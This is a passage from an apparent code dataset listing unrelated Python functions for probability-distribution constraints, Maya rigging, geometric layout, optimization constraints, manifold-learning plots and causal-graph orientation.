# Capping at 15. so that probability is less than 1, and entropy is\n # defined. b/147394924\n lambda x: tf.minimum(tf.maximum(x, -16.), 15.\n ), # works around the bug\n 'Geometric.probs':\n constrain_between_eps_and_one_minus_eps(),\n 'Binomial.probs':\n tfb.Sigmoid(),\n 'NegativeBinomial.probs':\n tfb.Sigmoid(),\n 'Bernoulli.probs':\n tfb.Sigmoid(),\n 'PlackettLuce.scores':\n tfb.Softplus(),\n 'ProbitBernoulli.probs':\n tfb.Sigmoid(),\n 'RelaxedBernoulli.probs':\n tfb.Sigmoid(),\n 'cutpoints': # Permit values that aren't too large\n lambda x: tfb.Ascending().forward(10. * tf.math.tanh(x)),\n 'log_rate':\n lambda x: tf.maximum(x, -16.),\n 'mixing_concentration':\n tfb.Softplus(),\n 'mixing_rate':\n tfb.Softplus(),\n 'rate':\n tfb.Softplus(),\n 'scale':\n tfb.Softplus(),\n 'scale_diag':\n tfb.Softplus(),\n 'scale_identity_multiplier':\n tfb.Softplus(),\n 'tailweight':\n tfb.Softplus(),\n 'temperature':\n tfb.Softplus(),\n 'total_count':\n lambda x: tf.floor(tfb.Sigmoid()(x / 100.) * 100.) 
+ 1.,\n 'Bernoulli':\n lambda d: dict(d, dtype=tf.float32),\n 'CholeskyLKJ':\n fix_lkj,\n 'LKJ':\n fix_lkj,\n 'Zipf':\n lambda d: dict(d, dtype=tf.float32),\n 'GeneralizedNormal.power':\n tfb.Softplus(),\n }\n\n if param is not None:\n return constraints.get('{}.{}'.format(dist, param),\n constraints.get(param, tfb.Identity()))\n return constraints.get(dist, tfb.Identity())", "def build_guide(self, **kwargs):\n\n # This builds your guide master and updates your options\n self.create_guide_master(**kwargs)\n\n prefix = self.prefix\n options = self.options\n mirror_value = self.mirror_value\n\n number_mid_ctrl = options.get('numberMidCtrls')\n num_joints = options.get('numberJoints')\n create_jaw = options.get('createJaw')\n create_skull = options.get('createReverseJaw')\n surface = options.get('createSurfaceDriver')\n create_fk_ctrls = options.get('createFKShaperCtrls')\n\n noxform_grp = self.guide_master + '_NOX'\n\n if mc.objExists ('drivenNeck_chest_Mid_bind'):\n mc.delete ('drivenNeck_chest_Mid_bind')\n\n\n pp = env.get_parts_paths()[-1]\n branch = r'BidepAutoRig\\part_joints\\neck_skel.mb'\n import_path = pp.replace('partsLibrary', branch)\n mc.file(import_path, i=1)\n\n if mc.objExists ('snap_chest_Mid_jnt'):\n mc.delete (mc.parentConstraint ('snap_chest_Mid_bind', 'drivenNeck_chest_Mid_bind'))\n\n\n snaps=[u'head_Mid_bind', u'headEnd_Mid_jnt', u'eye_Lt_bind', u'eye_Rt_bind', u'headTop_Mid_bind',\n u'headRear_Mid_bind', u'headSide_Lt_bind', u'headSide_Rt_bind', u'neck01_Mid_bind', u'neck02_Mid_bind',\n u'neck03_Mid_bind', u'neckEnd_Mid_jnt']\n\n for snap in snaps:\n target='snap_'+snap\n if mc.objExists (target):\n mc.delete (mc.parentConstraint (target, snap))\n\n\n\n\n # This finalizes your guide.\n self.finalize_guide()\n jnts_grp = self.guide_master + '_JNTS'\n mc.parent ('drivenNeck_chest_Mid_bind', jnts_grp)\n\n self.finalize_guide()", "def buildcutlineset():\r\n cutlineset=[[[-3.2697,-3.2697],[-4.3304,-4.3304]],[[-3.2697,-4.3304],[-4.3304,-3.2697]]]\r\n cutlineset.extend([[[-3.2697,176.0104],[-4.3304,174.9497]],[[-3.2697,174.9497],[-4.3304,176.0104]]])\r\n cutlineset.extend([[[176.0104,176.0104],[174.9497,174.9497]],[[176.0104,174.9497],[174.9497,176.0104]]])\r\n cutlineset.extend([[[175.4800,-3.05],[175.4800,-4.55]],[[174.7300,-3.8],[176.2300,-3.8]]])\r\n \r\n for cutline in cutlineset:\r\n for pos in cutline:\r\n pos[0]=pos[0]+globalconfig.CUTLINE_X_OFFSET\r\n pos[1]=pos[1]+globalconfig.CUTLINE_Y_OFFSET\r\n \r\n for row in range(0,globalconfig.X_ARRAY_NUM):\r\n cutlineset.append([[globalconfig.X_BLANK+row*(globalconfig.X_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_X_OFFSET,0.0+globalconfig.CUTLINE_Y_OFFSET],[globalconfig.X_BLANK+row*(globalconfig.X_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_X_OFFSET,-3.0+globalconfig.CUTLINE_Y_OFFSET]])\r\n cutlineset.append([[globalconfig.X_BLANK+row*(globalconfig.X_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_X_OFFSET,171.68+globalconfig.CUTLINE_Y_OFFSET],[globalconfig.X_BLANK+row*(globalconfig.X_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_X_OFFSET,174.68+globalconfig.CUTLINE_Y_OFFSET]])\r\n for line in range(0,globalconfig.Y_ARRAY_NUM):\r\n cutlineset.append([[0.0+globalconfig.CUTLINE_X_OFFSET,globalconfig.Y_BLANK+line*(globalconfig.Y_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_Y_OFFSET],[-3.0+globalconfig.CUTLINE_X_OFFSET,globalconfig.Y_BLANK+line*(globalconfig.Y_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_Y_OFFSET]])\r\n 
cutlineset.append([[171.68+globalconfig.CUTLINE_X_OFFSET,globalconfig.Y_BLANK+line*(globalconfig.Y_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_Y_OFFSET],[174.68+globalconfig.CUTLINE_X_OFFSET,globalconfig.Y_BLANK+line*(globalconfig.Y_LENGTH/globalconfig.CENTER_RATIO)+globalconfig.CUTLINE_Y_OFFSET]])\r\n return cutlineset", "def skeleton_duplicateJoint(self,sourceJoints = None, modifier = 'rig', connectToModule = False, connectAs = 'rigJoints', connectToSource = 'skinJoint', singleMode = False, cgmType = None, indices = [],blockNames=False):\n _str_func = 'skeleton_buildDuplicateChain'\n \n \n if indices:\n log.debug(\"|{0}| >> Indices arg: {1}\".format(_str_func, indices)) \n l_buffer = []\n for i in indices:\n l_buffer.append(sourceJoints[i])\n sourceJoints = l_buffer \n \n ml_source = cgmMeta.validateObjListArg(sourceJoints,mayaType=['joint'],noneValid=False)\n \n if connectToModule:\n #mRigNull = self.moduleTarget.rigNull\n \n #Get our segment joints\n if singleMode:\n l_jointsExist = connectToModule.getMessage(connectAs)\n else:\n l_jointsExist = connectToModule.msgList_get(connectAs,asMeta = False, cull = True)\n \n if l_jointsExist:\n log.debug(\"|{0}| >> Deleting existing {1} chain\".format(_str_func, modifier)) \n mc.delete(l_jointsExist)\n\n l_joints = mc.duplicate([i_jnt.mNode for i_jnt in ml_source],po=True,ic=True,rc=True)\n \n ml_joints = [cgmMeta.cgmObject(j) for j in l_joints]\n\n if blockNames:\n l_names = skeleton_getNameDicts(self,False,len(l_joints)) \n else:\n l_names = []\n \n for i,mJnt in enumerate(ml_joints):\n if blockNames:\n _d_tmp = l_names[i]\n log.debug(\"|{0}| >> blockName dict {1} | {2}\".format(_str_func, i,_d_tmp)) \n for a in ['cgmIterator','cgmName']:\n if _d_tmp.get(a):\n mJnt.addAttr(a, str(_d_tmp.get(a)),attrType='string',lock=True)\n\n if modifier is not None:\n #l_names[i]['cgmTypeModifier'] = modifier\n mJnt.addAttr('cgmTypeModifier', modifier,attrType='string',lock=True)\n if cgmType is not None:\n #l_names[i]['cgmType'] = cgmType \n mJnt.addAttr('cgmType', cgmType,attrType='string',lock=True)\n \n #l_joints[i] = mJnt.mNode\n if connectToSource:\n mJnt.connectChildNode(ml_joints[i].mNode,connectToSource,'{0}Joint'.format(modifier))#Connect\n \n if mJnt.hasAttr('scaleJoint'):\n if mJnt.scaleJoint in ml_skinJoints:\n int_index = ml_source.index(mJnt.scaleJoint)\n mJnt.connectChildNode(ml_source[int_index],'scaleJoint','sourceJoint')#Connect\n\n #Name loop\n ml_joints[0].parent = False\n for i,mJnt in enumerate(ml_joints):\n #mJnt.rename(NAMETOOLS.returnCombinedNameFromDict(l_names[i]))\n mJnt.doName()\t\n \n if connectToModule:\n if singleMode:\n connectToModule.connectChildNode(ml_joints[0],connectAs,'rigNull')\n else:\n connectToModule.msgList_connect(connectAs, ml_joints,'rigNull')#connect\t\n return ml_joints", "def SpacingConstraint(turbineX, turbineY, rotorDiameter, minSpacing=2.0):\n nTurbines = len(rotorDiameter)\n separation_squared = turbineSpacingSquared(turbineX, turbineY)\n spacing_con = np.zeros(int((nTurbines-1)*nTurbines/2))\n\n k = 0\n for i in range(0, nTurbines):\n for j in range(i+1, nTurbines):\n spacing_con[k] = separation_squared[k] - (0.5*minSpacing*rotorDiameter[i]+0.5*minSpacing*rotorDiameter[j])**2\n k += 1\n return spacing_con", "def hedge_maker(tail_width, head_width, node_ls, self_loops):\n tail_set = set()\n head_set = set()\n\n tail_full = False\n head_full = False\n \n while tail_full == False: \n selection = random.choice(node_ls)\n tail_set.add(selection)\n if len(tail_set) == tail_width:\n tail_full = 
True\n\n\n\n \n while head_full == False:\n selection = random.choice(node_ls)\n\n if self_loops == True: #if we don't want self loops, this checks to make sure the selection isn't one of the tail nodes\n head_set.add(selection)\n else: \n if selection not in tail_set:\n head_set.add(selection)\n\n if len(head_set) == head_width:\n head_full = True\n\n frozen_head = frozenset(head_set)\n frozen_tail = frozenset(tail_set)\n \n return (frozen_tail, frozen_head) #returns as a tuple of frozensets so that it will only be added to the edge_set if it's a unique edge", "def generate_connectivity_constraint(problem, b_list, add_S):\n\n # Constructing A_iq and b_iq for inequality (38) for all S in add_S as sp.coo matrix\n A_iq_row = []\n A_iq_col = []\n A_iq_data = []\n\n constraint_idx = 0\n # For each base\n for b, S_v_t in product(b_list, add_S):\n pre_S_transition = problem.graph.pre_tran_vt(S_v_t)\n pre_S_connectivity = problem.graph.pre_conn_vt(S_v_t)\n for v, t in S_v_t:\n # add y\n A_iq_row.append(constraint_idx)\n A_iq_col.append(problem.get_yb_idx(b, v, t))\n A_iq_data.append(1)\n for v0, v1, t0 in pre_S_transition:\n A_iq_row.append(constraint_idx)\n A_iq_col.append(problem.get_x_idx(b, v0, v1, t0))\n A_iq_data.append(-1)\n for v0, v1, t1 in pre_S_connectivity:\n A_iq_row.append(constraint_idx)\n A_iq_col.append(problem.get_xbar_idx(b, v0, v1, t1))\n A_iq_data.append(-1)\n constraint_idx += 1\n A_iq_38 = sp.coo_matrix(\n (A_iq_data, (A_iq_row, A_iq_col)), shape=(constraint_idx, problem.num_vars)\n )\n\n return Constraint(A_iq=A_iq_38, b_iq=np.zeros(constraint_idx))", "def create_plaquette(self, baseStr, fidpairs):\n ji_list = list(_itertools.product(list(range(self.nMinorRows)),\n list(range(self.nMinorCols))))\n assert(len(ji_list) >= len(fidpairs)), \"Number of minor rows/cols is too small!\"\n\n elements = [(j, i, prepStr + baseStr + effectStr)\n for (j, i), (prepStr, effectStr) in\n zip(ji_list[0:len(fidpairs)], fidpairs)] # note preps are *cols* not rows\n\n return CircuitPlaquette(baseStr, self.nMinorRows,\n self.nMinorCols, elements,\n self.aliases, fidpairs[:])", "def _grow_polygon_points(pts,growth):\n \n min_x1 = 0 # Initialize smallest x to 1st point\n min_x2 = 1 # Initialize second smallest x to 2nd point\n if pts[min_x2][0] < pts[min_x1][0]: # Swap if assumption was incorrect\n min_x1 = 1\n min_x2 = 0\n min_y1 = 0 # Initialize smallest y to 1st point\n min_y2 = 1 # Initialize second smallest y to 2nd point\n if pts[min_y2][1] < pts[min_y1][1]: # Swap if assumption was incorrect\n min_y1 = 1\n min_y2 = 0\n for i in range(2,len(pts)): # For other 2 points\n if pts[i][0] < pts[min_x2][0]: # Point is less than 2nd smallest\n if pts[i][0] < pts[min_x1][0]: # Point is also less than 1st smallest\n min_x2 = min_x1\n min_x1 = i\n else:\n min_x2 = i\n if pts[i][1] < pts[min_y2][1]:\n if pts[i][1] < pts[min_y1][1]:\n min_y2 = min_y1\n min_y1 = i\n else:\n min_y2 = i\n print\n print pts\n print \"min_x1: \" + str(min_x1) \n print \"min_x2: \" + str(min_x2) \n print \"min_y1: \" + str(min_y1) \n print \"min_y2: \" + str(min_y2) \n for i in range(len(pts)): # For each point\n if i == min_x1 or i == min_x2: # x is minimum, shrink\n pts[i] = (pts[i][0] - growth, pts[i][1])\n else: # x is maximum, grow\n pts[i] = (pts[i][0] + growth, pts[i][1])\n if i == min_y1 or i == min_y2: # y is minimum, shrink\n pts[i] = (pts[i][0], pts[i][1] - growth) \n else: # y is maximum, grow\n pts[i] = (pts[i][0], pts[i][1] + growth)", "def create_constraints(self, courses):\n for i, course1 in 
enumerate(courses):\n for j, course2 in enumerate(courses):\n if i <= j:\n continue\n self.p.add_constraint(section_constraint, [course1, course2])\n self.p.add_constraint(self.time_conflict, [course1])", "def _make_simple_partition_label(chain_dict):\n\n cps = chain_dict['chainParts']\n if not (_select_simple_chainparts(cps)):\n raise NotImplementedError(\n 'chain fails substring selection: not \"simple\": %s' % (\n chain_dict['chainName']))\n \n label = 'simplepartition(['\n for cp in cps:\n smcstr = str(cp['smc'])\n if smcstr == 'nosmc':\n smcstr = ''\n for i in range(int(cp['multiplicity'])):\n # condition_str = '(%set,%s,%s)' % (str(cp['threshold']),\n # str(cp['etaRange']),\n # smcstr,)\n condition_str = '(%set,%s' % (str(cp['threshold']),\n str(cp['etaRange']),)\n if smcstr:\n condition_str += ',%s)'\n else:\n condition_str += ')'\n label += condition_str\n label += '])'\n return label", "def buildWrist(wrist_ctrl=None, wrist_jnt=None, fingeramount=5, rot_ax=\"Y\"):\n selection = mc.ls(sl=True)\n\n if not selection and (not wrist_jnt or not wrist_ctrl):\n print \"Please select the wrist joint then the wrist controller\"\n return\n if not wrist_ctrl:\n wrist_ctrl = selection[1]\n if not wrist_jnt:\n wrist_jnt = selection[0]\n\n mc.parentConstraint(wrist_jnt, wrist_ctrl, mo=True)\n\n finger_jnts = mc.listRelatives(wrist_jnt, allDescendents=True)\n numfinger_jnts = len(finger_jnts)/fingeramount\n\n print \"fingeramount: \", fingeramount\n for i in range(fingeramount):\n\n singlefinger_jnts = finger_jnts[(numfinger_jnts * i): numfinger_jnts * (i+1)]\n singlefinger_jnts.reverse()\n singlefinger_jnts.pop()\n attrname = getAttrName(singlefinger_jnts[0])\n mc.addAttr(wrist_ctrl, longName=attrname, attributeType=\"float\", keyable=True)\n\n print \"singlefinger_jnts \", singlefinger_jnts\n\n fk_ctrls = FKChain.buildFKChain(fk_joints=singlefinger_jnts, ctrl_scale=0.5, keyword=\"jnt\", createXtra_grp=True)\n\n print \"FK Controllers: \", fk_ctrls\n\n outergrp = \"\"\n\n for j, fk in enumerate(fk_ctrls):\n ctrlgrp = mc.listRelatives(fk, parent=True)[0]\n\n if j == 0:\n temp = mc.listRelatives(ctrlgrp, parent=True)[0]\n outergrp = temp\n mc.connectAttr(\"%s.%s\"%(wrist_ctrl, attrname), \"%s.rotate%s\"%(ctrlgrp, rot_ax))\n\n print \"outer grp\", outergrp\n print \"wrist_ctrl\", wrist_ctrl\n\n mc.parent(outergrp, wrist_ctrl)", "def init_constraint_list(self):\n constraints = []\n for row, equ_val, rhs_val in \\\n zip(self.matrix, self.equ_vec, self.rhs_vec):\n\n constraints.append({'type': self.get_eq_type(equ_val),\n 'fun': lambda x: rhs_val - np.dot(row, x)})\n\n bounds = Bounds(self.low_bounds, self.upper_bounds)\n\n return constraints, bounds", "def glow_boundary(bound):\n assert bound < 4\n global layout\n temp = len(layout) - 1\n for i in range(bound, bound + len_square(bound)):\n for j in range(bound, bound + len_square(bound)): # TODO: assign this to a variable\t\n layout[i][j] = 1", "def SwissRollWithConstrain(nei = [5,25,50]):\n n_samples = 4000\n n_neighbor = 60\n noise = 0\n X, _ = make_swiss_roll(n_samples, noise=noise, random_state=42)\n X = X*2 #scaling ths Swiss\n\n neigh = NearestNeighbors(n_neighbors=n_neighbor).fit(X)\n _, indxes = neigh.kneighbors(X)\n\n SwissConstrain = np.delete(X,indxes[1500,:], axis=0)\n SwissConstrainNoisy = SwissConstrain + np.random.normal(0,1,[n_samples-n_neighbor,3])\n\n elevation = 10\n azimoth = 60\n fig = plt.figure(figsize=(21,7))\n ax1 = fig.add_subplot(131, projection='3d')\n ax1.set_zlim(-30, 30)\n ax1.scatter(X[:, 0], X[:, 1], X[:, 2], 
c=np.linalg.norm((X[:, 0], X[:, 1]), axis=0))\n ax1.set_title('Swiss Roll')\n ax1.view_init(elev=elevation, azim=azimoth)\n ax1 = fig.add_subplot(132, projection='3d')\n ax1.set_zlim(-30, 30)\n ax1.scatter(SwissConstrain[:, 0], SwissConstrain[:, 1], SwissConstrain[:, 2],\n c=np.linalg.norm((SwissConstrain[:, 0], SwissConstrain[:, 1]), axis=0))\n ax1.set_title('Swiss Roll with constrain')\n ax1.view_init(elev=elevation, azim=azimoth)\n ax1 = fig.add_subplot(133, projection='3d')\n ax1.set_zlim(-30, 30)\n ax1.scatter(SwissConstrainNoisy[:, 0], SwissConstrainNoisy[:, 1], SwissConstrainNoisy[:, 2],\n c=np.linalg.norm((SwissConstrainNoisy[:, 0], SwissConstrainNoisy[:, 1]), axis=0))\n ax1.set_title('Noisy Swiss Roll with constrain')\n ax1.view_init(elev=elevation, azim=azimoth)\n plt.savefig('Swiss Roll with different petubations')\n\n DataToPlot = [X,SwissConstrain,SwissConstrainNoisy]\n DataName = ['Swiss ISOMAP','Swiss with constrain ISOMAP', 'Swiss with constrain and noise ISOMAP']\n\n # Ploting Swiss Isomapping\n for neighbors in nei:\n fig = plt.figure(figsize=(30, 10))\n for i, j in enumerate(DataToPlot):\n Swiss_isomap = Isomap(j, 2, neighbors)\n method = DataName[i]\n ax = fig.add_subplot(1, len(DataToPlot), i + 1)\n ax.scatter(Swiss_isomap[:, 0], Swiss_isomap[:, 1],\n c=np.linalg.norm((Swiss_isomap[:, 0], Swiss_isomap[:, 1]), axis=0), cmap=plt.cm.Spectral)\n ax.set_title('{} with {} Neighbours'.format(method, neighbors))\n # making_plot(Swiss_isomap, pallete=Swiss_isomap[:, 0:1], neighbors=neighbors, method=method) #An option to plot single graphs\n plt.savefig('Swiss ISOMAP embbeding for {} neighbour'.format(neighbors))\n\n DataName = ['Swiss LLE', 'Swiss with constrain LLE', 'Swiss with constrain and noise LLE']\n # Ploting Swiss LLE\n for neighbors in nei:\n fig = plt.figure(figsize=(30, 10))\n for i, j in enumerate(DataToPlot):\n Swiss_LLE = LLE(j, 2, neighbors)\n method = DataName[i]\n ax = fig.add_subplot(1, len(DataToPlot), i + 1)\n ax.scatter(Swiss_LLE[:, 0], Swiss_LLE[:, 1],\n c=np.linalg.norm((Swiss_LLE[:, 0], Swiss_LLE[:, 1]), axis=0), cmap=plt.cm.Spectral)\n ax.set_title('{} with {} Neighbours'.format(method, neighbors))\n # making_plot(Swiss_LLE, pallete=Swiss_LLE[:, 0:1], neighbors=neighbors, method=method) #An option to plot single graphs\n plt.savefig('Swiss LLE embbeding for {} neighbour'.format(neighbors))\n return", "def _constraints_utility(self):\n\n def rule(model):\n total = summation(self.utilities, model.A)\n return model.A_total == total\n\n self.model.constrain_A_total = Constraint(rule=rule)\n\n def rule(model):\n total = 2 * summation(self.utilities, model.A2)\n return model.A2_total == total\n\n self.model.constrain_A2_total = Constraint(rule=rule)\n\n def rule(model):\n total = 3 * summation(self.utilities, model.A3)\n return model.A3_total == total\n\n self.model.constrain_A3_total = Constraint(rule=rule)\n\n def rule(model):\n total = 4 * summation(self.utilities, model.A4)\n return model.A4_total == total\n\n self.model.constrain_A4_total = Constraint(rule=rule)\n\n def rule(model):\n completion_bonus = self.task_completion_bonus * self.task_duration\n total = summation(completion_bonus, model.T_total)\n return model.Completion_total == total\n\n self.model.constrain_completion_total = Constraint(rule=rule)\n\n def rule(model):\n scaling = 0.2\n affinity = np.outer(c.AFFINITY_COGNITIVE, self.task_cognitive_load)\n\n # TODO(cathywu) replace this code when \"simple slicing\" is clarified\n zeros1 = np.zeros((1, self.num_tasks))\n zeros2 = np.zeros((2, 
self.num_tasks))\n zeros3 = np.zeros((3, self.num_tasks))\n\n total = summation(affinity, model.A)\n total += summation(affinity, model.A2)\n total += summation(affinity, model.A3)\n total += summation(affinity, model.A4)\n\n total += summation(np.vstack((affinity[1:, :], zeros1)), model.A2)\n total += summation(np.vstack((affinity[1:, :], zeros1)), model.A3)\n total += summation(np.vstack((affinity[1:, :], zeros1)), model.A4)\n\n total += summation(np.vstack((affinity[2:, :], zeros2)), model.A3)\n total += summation(np.vstack((affinity[2:, :], zeros2)), model.A4)\n\n total += summation(np.vstack((affinity[3:, :], zeros3)), model.A4)\n total *= scaling\n\n return model.Affinity_cognitive_total == total\n\n self.model.constrain_affinity_cognitive_total = Constraint(rule=rule)", "def W_joint_chain(self, joint_name):\n if self.joint_syms[joint_name].get(\"W\") is None:\n # go up the parent chain of transformations\n parent_joint_name = self.global_syms[\"Jname2parentJname\"].get(\n joint_name)\n if parent_joint_name is None:\n self.joint_syms[joint_name][\"W\"] = \\\n self.joint_syms[joint_name][\"q_rpy\"]\n else:\n self.joint_syms[joint_name][\"W\"] = (\n self.W_joint_chain(parent_joint_name)\n + self.joint_syms[joint_name][\"q_rpy\"]\n )\n return self.joint_syms[joint_name][\"W\"]", "def _set_starting_point_embedding(\n self,\n basis: str = None,\n borders: tuple = None,\n ) -> None:\n # check that the basis is present\n bindices = []\n if 'X_'+basis not in self.adata.obsm.keys():\n raise ValueError(\n 'X_%s is not an embedding in `.adata.obsm`.' % basis)\n embed = self.vadata.obsm['X_'+basis]\n\n # get all cells within the borders specified along each dimension\n for i, min_max in enumerate(borders):\n bidx = np.logical_and(\n embed[:, i] > min_max[0],\n embed[:, i] < min_max[1],\n )\n bindices.append(bidx)\n\n # use cells that meet all border criteria as starting points\n bidx = np.logical_and.reduce(bindices)\n self.starting_points = self.pfield[bidx, :]\n return", "def constrain(obj_dict):\n\n point_set = set()\n for obj in obj_dict['point'].values():\n if obj.x is None and obj.y is None:\n if obj.random is True:\n obj.x = random.uniform(-1, 1)\n obj.y = random.uniform(-1, 1)\n else:\n point_set.add(obj)\n\n i = 0\n points = [y for y in point_set]\n\n old_len = None\n\n while points:\n if i == len(points):\n # Ensure that something has changed\n if old_len == len(points):\n p = final_check(points)\n if p is None:\n # If nothing has changed, error out\n error(name=\"Underconstrained system\",\n msg=\"Unable to place the following points: \" +\n str([x.name for x in points]))\n else:\n points.remove(p)\n i = 0\n continue\n # Modular arithmetic\n old_len = len(points)\n i = 0\n # Get the current point\n p = points[i]\n\n # If there are no constraints on the point, generate it randomly\n if len(p.constraints) == 0:\n p.x = random.uniform(-1, 1)\n p.y = random.uniform(-1, 1)\n points.remove(p)\n i = 0\n continue\n # If there is one constraint on the point, we can plcae it anywhere\n # on the constraint\n elif len(p.constraints) == 1:\n obj = list(p.constraints)[0]\n # Check the symify constraint because of the fact that arbitrary\n # point calls it\n if obj is None or obj.symify() is None:\n i += 1\n continue\n\n p.x, p.y = obj.arbitrary_point()\n\n # Start the iteration over\n i = 0\n points.remove(p)\n # Otherwise, there are multiple constraints\n else:\n symified_constraints = []\n # Get all of the constraints that we have processed and given\n # locations to\n for x in p.constraints:\n 
tmp = x.symify()\n if tmp is not None:\n symified_constraints.append(tmp)\n # Ensure that we have at least two constraints\n # (to define an intersection); if not go to the next point\n if len(symified_constraints) < 2:\n i += 1\n continue\n # Compute the intersection\n intersection = sympy.intersection(*symified_constraints)\n\n # If there was no intersection, continue\n if intersection == []:\n i += 1\n continue\n # Otherwise, we have a list of possible intersections, pick\n # one of them randomly to use\n else:\n r = random.randint(0, len(intersection) - 1)\n p.x = float(intersection[r].x)\n p.y = float(intersection[r].y)\n i = 0\n points.remove(p)", "def _make_ties(self) -> None:\n\n # get all hint spaces with adjacent '?'s\n frontier = {neighbor: self._lookup[neighbor] for pos, space in self._unknowns.items() for neighbor in\n space.neighbors.values() if neighbor and self._lookup[neighbor].hint.isnumeric()}\n\n # use hints to create \"zones\" of '?'-squares along the frontier,\n # detailing the # of mines left to find in each zone.\n for pos, space in frontier.items():\n local_unknowns = {coord for coord in space.neighbors.values() if coord in self._unknowns}\n for unknown in local_unknowns:\n key = frozenset(local_unknowns)\n self._lookup[unknown].zones[key] = self._lookup[unknown].zones.setdefault(key, space.num_undiscovered)\n self._lookup[unknown].zones[key] = min(space.num_undiscovered, self._lookup[unknown].zones[key])\n self._lookup[unknown].ties |= local_unknowns - {unknown}\n self._remaining_zones.update(self._lookup[unknown].zones)\n\n # split overlapping zones into components\n for unknown in self._unknowns.values():\n for zone, num_undiscovered in list(unknown.zones.items()):\n if zone not in unknown.zones:\n continue\n for other_zone, other_num_undiscovered in list(unknown.zones.items()):\n if other_zone in unknown.zones:\n shared = zone & other_zone\n\n if zone < other_zone or (shared and other_num_undiscovered > num_undiscovered):\n # if \"zone\" & \"other_zone\" share members then\n # it is possible to split the zone w/ the higher # of mines\n # into components, \"shared\" & \"not_shared\".\n\n # unknown.zones.pop(other_zone)\n\n not_shared = other_zone - shared\n unknown.zones[not_shared] = other_num_undiscovered - num_undiscovered\n else:\n print(end='')\n return", "def orient(skeleton, sep_set):\n\n def _rule_1(cpdag):\n \"\"\"Rule_1\n\n Orient i——j into i——>j whenever there is an arrow k——>i\n such that k and j are nonadjacent.\n \"\"\"\n\n columns = list(range(cpdag.shape[1]))\n ind = list(combinations(columns, 2))\n for ij in sorted(ind, key=lambda x: (x[1], x[0])):\n # Iteration every (i, j)\n i, j = ij\n if cpdag[i, j] * cpdag[j, i] == 0:\n continue\n # search i——j\n else:\n all_k = [x for x in columns if x not in ij]\n for k in all_k:\n if cpdag[k, i] == 1 and cpdag[i, k] == 0 \\\n and cpdag[k, j] + cpdag[j, k] == 0:\n cpdag[j, i] = 0\n return cpdag\n\n def _rule_2(cpdag):\n \"\"\"Rule_2\n\n Orient i——j into i——>j whenever there is a chain i——>k——>j.\n \"\"\"\n\n columns = list(range(cpdag.shape[1]))\n ind = list(combinations(columns, 2))\n for ij in sorted(ind, key=lambda x: (x[1], x[0])):\n # Iteration every (i, j)\n i, j = ij\n if cpdag[i, j] * cpdag[j, i] == 0:\n continue\n # search i——j\n else:\n all_k = [x for x in columns if x not in ij]\n for k in all_k:\n if cpdag[i, k] == 1 and cpdag[k, i] == 0 \\\n and cpdag[k, j] == 1 \\\n and cpdag[j, k] == 0:\n cpdag[j, i] = 0\n return cpdag\n\n def _rule_3(cpdag, sep_set=None):\n \"\"\"Rule_3\n\n Orient i——j 
into i——>j\n whenever there are two chains i——k——>j and i——l——>j\n such that k and l are non-adjacent.\n \"\"\"\n\n columns = list(range(cpdag.shape[1]))\n ind = list(combinations(columns, 2))\n for ij in sorted(ind, key=lambda x: (x[1], x[0])):\n # Iteration every (i, j)\n i, j = ij\n if cpdag[i, j] * cpdag[j, i] == 0:\n continue\n # search i——j\n else:\n for kl in sep_set.keys(): # k and l are nonadjacent.\n k, l = kl\n # if i——k——>j and i——l——>j\n if cpdag[i, k] == 1 \\\n and cpdag[k, i] == 1 \\\n and cpdag[k, j] == 1 \\\n and cpdag[j, k] == 0 \\\n and cpdag[i, l] == 1 \\\n and cpdag[l, i] == 1 \\\n and cpdag[l, j] == 1 \\\n and cpdag[j, l] == 0:\n cpdag[j, i] = 0\n return cpdag\n\n def _rule_4(cpdag, sep_set=None):\n \"\"\"Rule_4\n\n Orient i——j into i——>j\n whenever there are two chains i——k——>l and k——>l——>j\n such that k and j are non-adjacent.\n \"\"\"\n\n columns = list(range(cpdag.shape[1]))\n ind = list(combinations(columns, 2))\n for ij in sorted(ind, key=lambda x: (x[1], x[0])):\n # Iteration every (i, j)\n i, j = ij\n if cpdag[i, j] * cpdag[j, i] == 0:\n continue\n # search i——j\n else:\n for kj in sep_set.keys(): # k and j are nonadjacent.\n if j not in kj:\n continue\n else:\n kj = list(kj)\n kj.remove(j)\n k = kj[0]\n ls = [x for x in columns if x not in [i, j, k]]\n for l in ls:\n if cpdag[k, l] == 1 \\\n and cpdag[l, k] == 0 \\\n and cpdag[i, k] == 1 \\\n and cpdag[k, i] == 1 \\\n and cpdag[l, j] == 1 \\\n and cpdag[j, l] == 0:\n cpdag[j, i] = 0\n return cpdag\n\n columns = list(range(skeleton.shape[1]))\n cpdag = deepcopy(skeleton)\n # pre-processing\n for ij in sep_set.keys():\n i, j = ij\n all_k = [x for x in columns if x not in ij]\n for k in all_k:\n if cpdag[i, k] + cpdag[k, i] != 0 \\\n and cpdag[k, j] + cpdag[j, k] != 0:\n if k not in sep_set[ij]:\n if cpdag[i, k] + cpdag[k, i] == 2:\n cpdag[k, i] = 0\n if cpdag[j, k] + cpdag[k, j] == 2:\n cpdag[k, j] = 0\n cpdag = _rule_1(cpdag=cpdag)\n cpdag = _rule_2(cpdag=cpdag)\n cpdag = _rule_3(cpdag=cpdag, sep_set=sep_set)\n cpdag = _rule_4(cpdag=cpdag, sep_set=sep_set)\n\n return cpdag", "def center_flows(L_wprime, U_wprime, L_w3, U_w3, L_overlap, U_overlap):\n # examine every possible point\n current_dist_to_edge = -1\n point = (0,0)\n #print(\"w3 range: [{}, {}]\".format(L_w3, U_w3))\n #print(\"w' range: [{}, {}]\".format(L_wprime, U_wprime))\n #print(\"overlap range: [{},{}]\".format(L_overlap, U_overlap))\n for y in range(L_w3, U_w3 + 1):\n #print(\"y={}\".format(y))\n LH_bound = max(L_wprime, L_overlap - y)\n #print(\"LH bound = {}\".format(LH_bound))\n RH_bound = min(U_wprime, U_overlap - y)\n #print(\"RH bound = {}\".format(RH_bound))\n for x in range(LH_bound, RH_bound + 1):\n # w3 UB: 0x + 1y - U_w3 = 0\n # w3 LB: 0x + 1y - L_w3 = 0\n # wprime UB: 1x + 0y - U_wprime\n # wprime LB: 1x + 0y - 